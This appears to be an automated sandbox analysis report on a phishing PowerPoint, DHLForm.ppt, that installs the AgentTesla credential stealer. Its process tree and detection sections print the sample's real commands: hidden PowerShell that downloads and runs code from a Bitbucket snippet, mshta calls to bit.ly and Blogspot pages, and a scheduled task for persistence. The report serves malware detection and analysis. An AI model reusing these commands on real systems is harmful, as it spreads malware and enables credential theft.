Loading ...

Play interactive tourEdit tour

Windows Analysis Report DHLForm.ppt

Overview

General Information

Sample Name:DHLForm.ppt
Analysis ID:483878
MD5:5a5ff1cffdb0ea343fd5ab32c6eeb740
SHA1:e372c4f53febe5c4d74a01eb6985e80a31d52e25
SHA256:9e4134fbb243efdb6d965eec21d98b4ad702e7fca13b5f1af47d30e3b0019585
Tags:PowershellpptPS-3losh-ratRat
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for submitted file
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Compiles code for process injection (via .Net compiler)
Writes or reads registry keys via WMI
Injects a PE file into a foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Writes registry values via WMI
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Connects to a URL shortener service
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document contains an embedded VBA macro which executes code when the document is opened / closed
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Enables debug privileges
PE file does not import any functions
Installs a global mouse hook
Document contains embedded VBA macros
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w10x64
  • POWERPNT.EXE (PID: 256 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE' /AUTOMATION -Embedding MD5: 68F52CD14C61DDC941769B55AE3F2EE9)
  • cmd.exe (PID: 3728 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\DHLForm.ppt' MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • POWERPNT.EXE (PID: 3640 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE' 'C:\Users\user\Desktop\DHLForm.ppt' /ou '' MD5: 68F52CD14C61DDC941769B55AE3F2EE9)
      • mshta.exe (PID: 5220 cmdline: MsHta https://bitly.com/yuiwqhdsavbdjagh MD5: 7083239CE743FDB68DFC933B7308E80A)
        • powershell.exe (PID: 6156 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB); MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • csc.exe (PID: 2520 cmdline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uz5edm2y\uz5edm2y.cmdline' MD5: 350C52F71BDED7B99668585C15D70EEA)
        • schtasks.exe (PID: 6212 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\'' MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 6404 cmdline: MsHtA 'http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6336 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB); MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5884 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a0uccovc\a0uccovc.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5216 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES797A.tmp' 'c:\Users\user\AppData\Local\Temp\a0uccovc\CSCCC0B7B204924196A28CF024B8788083.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • RegAsm.exe (PID: 4276 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • powershell.exe (PID: 7044 cmdline: 'C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB); MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • csc.exe (PID: 5844 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
      • cvtres.exe (PID: 5808 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES63A1.tmp' 'c:\Users\user\AppData\Local\Temp\lmts0v03\CSCCA8985A0394D48BFA864CA75A5282D3A.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
    • RegAsm.exe (PID: 380 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • RegAsm.exe (PID: 5332 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • mshta.exe (PID: 4180 cmdline: 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@backbones1234511a.blogspot.com/p/ayoolaback.html' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • mshta.exe (PID: 6448 cmdline: 'C:\Windows\system32\MsHTa.exe' https://startthepartyup.blogspot.com/p/backbone16.html' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • mshta.exe (PID: 5900 cmdline: 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup15.html' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • powershell.exe (PID: 6464 cmdline: 'C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 6452 cmdline: 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@backbones1234511a.blogspot.com/p/ayoolaback.html' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • mshta.exe (PID: 68 cmdline: 'C:\Windows\system32\MsHTa.exe' https://startthepartyup.blogspot.com/p/backbone16.html' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • mshta.exe (PID: 5856 cmdline: 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup15.html' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000032.00000002.474315568.0000000003441000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000032.00000002.474315568.0000000003441000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000032.00000002.462560709.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000032.00000002.462560709.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000016.00000002.506840923.000001ACC5317000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 22 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            40.2.RegAsm.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              40.2.RegAsm.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                22.2.powershell.exe.1acc4f3f158.1.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  22.2.powershell.exe.1acc4f3f158.1.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    22.2.powershell.exe.1acc5317148.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 11 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper ArgumentsShow sources
                      Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: 'C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7044, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 380
                      Sigma detected: MSHTA Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: MsHta https://bitly.com/yuiwqhdsavbdjagh, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5220, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, ProcessId: 6156
                      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: MsHta https://bitly.com/yuiwqhdsavbdjagh, CommandLine: MsHta https://bitly.com/yuiwqhdsavbdjagh, CommandLine|base64offset|contains: 2, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE' 'C:\Users\user\Desktop\DHLForm.ppt' /ou '', ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, ParentProcessId: 3640, ProcessCommandLine: MsHta https://bitly.com/yuiwqhdsavbdjagh, ProcessId: 5220
                      Sigma detected: Mshta Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: MsHta https://bitly.com/yuiwqhdsavbdjagh, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5220, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, ProcessId: 6156
                      Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7044, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline', ProcessId: 5844
                      Sigma detected: Possible Applocker BypassShow sources
                      Source: Process startedAuthor: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: 'C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7044, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 380
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: MsHta https://bitly.com/yuiwqhdsavbdjagh, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5220, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, ProcessId: 6156
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132762198332368709.6156.DefaultAppDomain.powershell

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: DHLForm.pptVirustotal: Detection: 22%Perma Link
                      Source: DHLForm.pptReversingLabs: Detection: 22%
                      Source: 40.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49778 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49786 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49840 version: TLS 1.0
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 67.199.248.15:443 -> 192.168.2.3:49743 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49757 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49758 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.186.35:443 -> 192.168.2.3:49765 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49770 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49771 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49774 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49777 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49781 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49783 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49785 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49788 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49789 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49790 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49792 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49794 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49799 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49800 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49807 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49818 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49828 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49838 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49839 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49844 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49845 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49847 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49848 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49850 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49852 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49855 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49856 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.225:443 -> 192.168.2.3:49858 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 216.58.215.233:443 -> 192.168.2.3:49859 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.13:443 -> 192.168.2.3:49861 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49863 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49866 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.203.110:443 -> 192.168.2.3:49871 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.217.168.36:443 -> 192.168.2.3:49870 version: TLS 1.2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

                      Software Vulnerabilities:

                      barindex
                      Document exploit detected (process start blacklist hit)Show sources
                      Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
                      Source: global trafficTCP traffic: 192.168.2.3:49743 -> 67.199.248.15:443
                      Source: global trafficDNS query: name: bitly.com
                      Source: global trafficTCP traffic: 192.168.2.3:49743 -> 67.199.248.15:443
                      Source: powerpnt.exeMemory has grown: Private usage: 0MB later: 49MB
                      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49778 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49786 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49840 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: GET /yuiwqhdsavbdjagh HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bitly.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /p/ayoolaayoola.html HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: johonathahogyaabagebarhomeintum.blogspot.com
                      Source: global trafficHTTP traffic detected: GET /static/v1/widgets/1667664774-css_bundle_v2.css HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /static/v1/jsbin/403901366-ieretrofit.js HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=9facc617-3779-4049-ad62-56a50925e3fb HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
